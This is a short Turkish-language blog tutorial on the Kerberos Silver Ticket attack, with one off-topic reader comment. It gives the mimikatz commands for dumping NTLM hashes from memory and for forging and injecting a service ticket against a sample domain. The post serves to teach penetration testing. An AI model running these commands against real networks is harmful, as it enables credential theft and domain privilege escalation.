Kerberos | Silver Ticket

Okunması gereken yazılar:

Silver Ticket tekniğinde saldırganın amacı, hizmet veren servis hesabına ait NTLM hash’i ile TGS oluşturarak domain üzerindeki yetkilerini yükseltmektir.

Silver Ticket’ı oluşturmak için servise ait olan kullanıcının NTLM hash’in bilinmesi gerekmektedir (Bknz. Kerberoasting).

Makine üzerindeki NTLM hash’lerini almak için mimikatz’i kullanabiliriz.

mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords

Mimikatz yardımı ile Silver Ticket’ı oluşturabiliriz.

mimikatz# kerberos::golden /user:evil /domain:pentest.local /sid:S-1-5-21-434157810-3574284310-2996746512-500  /ticket:evil.tck /ptt

Referanslar

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

2 Comments

  1. semih said:

    gereksiz bir şey olcak ama Macbookda kullandığınız font nedir acaba

    March 22, 2020
    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *